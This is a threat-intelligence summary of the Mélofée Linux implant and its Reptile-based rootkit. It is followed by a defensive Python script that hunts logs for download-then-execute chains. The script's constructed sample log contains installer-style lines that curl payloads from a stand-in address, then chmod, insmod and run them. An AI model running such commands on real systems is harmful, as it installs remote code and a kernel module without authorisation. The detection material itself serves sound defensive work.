A new malware family called Mélofée has been discovered targeting Linux servers belonging to a small number of high-value targets. The implant has been attributed to a cluster of Chinese state-sponsored groups, specifically the Winnti group, on the basis of its capabilities and other TTPs.
Mélofée has three variants
ExaTrack detected three different samples of Mélofée, likely dated between January and May 2022.
- All three samples share a common code base, but their communication protocols and encryption methods differ from sample to sample, which suggests the tooling was still under active development.
- One sample dropped a kernel rootkit built for a specific kernel version; its code is based on the open-source rootkit project Reptile.
- Every sample includes an installer that uses shell commands to download the rootkit and the main implant from an attacker-controlled server.
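The installer behaviour described above (shell commands fetch a payload, then the fetched file is made executable, run, or loaded as a kernel module) leaves a download-then-execute chain in host command logs that is easy to hunt for. The script below is an added example of that correlation and is not code from ExaTrack or from the Mélofée samples. It assumes a line-oriented command log of the form "<timestamp> <host> <command>" (an exported shell history, or auditd EXECVE records flattened by a collector); the log lines and the 198.51.100.7 address are constructed for the example and are not indicators taken from the samples.

```python
"""Hunt for a shell-based installer's download-then-execute chain.

Added example, not code from ExaTrack or the Mélofée samples. Assumes one
"<timestamp> <host> <command>" per line. SAMPLE_LOG and the address
198.51.100.7 are constructed for the example, not real indicators.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# A curl/wget invocation that fetches an http(s) URL.
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b.*?(?P<url>https?://\S+)")
# Explicit output path: curl -o/--output, wget -O. (curl's bare -O takes the
# remote name and no path; a URL captured here is skipped below.)
OUTPUT_RE = re.compile(r"(?:^|\s)(?:-o|-O|--output)\s+(?P<path>\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+(?P<path>\S+)")
INSMOD_RE = re.compile(r"\binsmod\s+(?P<path>\S+)")
# Direct execution by path, or via a shell interpreter (options excluded).
EXEC_RES = (
    re.compile(r"^(?P<path>/\S+|\./\S+)"),
    re.compile(r"\b(?:sh|bash)\s+(?P<path>[^-]\S*)"),
)


@dataclass
class Finding:
    ts: str
    host: str
    action: str          # "chmod", "insmod" or "exec"
    path: str
    url: Optional[str]   # where the file came from, if a download was seen


def parse_line(line: str) -> Tuple[str, str, str]:
    ts, host, cmd = line.split(" ", 2)
    return ts, host, cmd


def hunt(lines: List[str]) -> List[Finding]:
    """Correlate downloads with later use of the downloaded file on the same host."""
    downloaded: Dict[Tuple[str, str], str] = {}   # (host, path) -> url
    findings: List[Finding] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ts, host, cmd = parse_line(raw)

        dl = DOWNLOAD_RE.search(cmd)
        if dl:
            out = OUTPUT_RE.search(cmd)
            if out and not out.group("path").startswith("http"):
                downloaded[(host, out.group("path"))] = dl.group("url")
            continue

        m = CHMOD_RE.search(cmd)
        if m and (host, m.group("path")) in downloaded:
            findings.append(Finding(ts, host, "chmod", m.group("path"),
                                    downloaded[(host, m.group("path"))]))
            continue

        m = INSMOD_RE.search(cmd)
        if m:
            path = m.group("path")
            url = downloaded.get((host, path))
            # A module loaded from outside the installed module tree is worth a
            # look on its own; one that was just downloaded even more so.
            if url is not None or not path.startswith("/lib/modules/"):
                findings.append(Finding(ts, host, "insmod", path, url))
            continue

        for rx in EXEC_RES:
            m = rx.search(cmd)
            if m and (host, m.group("path")) in downloaded:
                findings.append(Finding(ts, host, "exec", m.group("path"),
                                        downloaded[(host, m.group("path"))]))
                break
    return findings


# Constructed log: an installer-style chain followed by a benign update fetch
# whose archive is only unpacked, never executed, so it is not flagged.
SAMPLE_LOG = """\
2022-03-01T10:00:01 srv1 curl -s -o /tmp/.x/ld.so http://198.51.100.7/ld.so
2022-03-01T10:00:02 srv1 curl -s -o /tmp/.x/mod.ko http://198.51.100.7/mod.ko
2022-03-01T10:00:03 srv1 chmod +x /tmp/.x/ld.so
2022-03-01T10:00:04 srv1 insmod /tmp/.x/mod.ko
2022-03-01T10:00:05 srv1 /tmp/.x/ld.so
2022-03-01T10:05:00 srv1 wget -O /opt/app/update.tar.gz https://updates.example.com/app.tar.gz
2022-03-01T10:05:10 srv1 tar xzf /opt/app/update.tar.gz -C /opt/app
""".splitlines()

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.ts} {f.host}: {f.action} {f.path} (fetched from {f.url})")
```

The correlation is keyed on host and output path rather than on any fixed file name or URL, so it survives the renaming an operator would do between deployments; a plain download with no subsequent chmod, exec or insmod of the same file stays silent, which keeps ordinary package and update traffic out of the results.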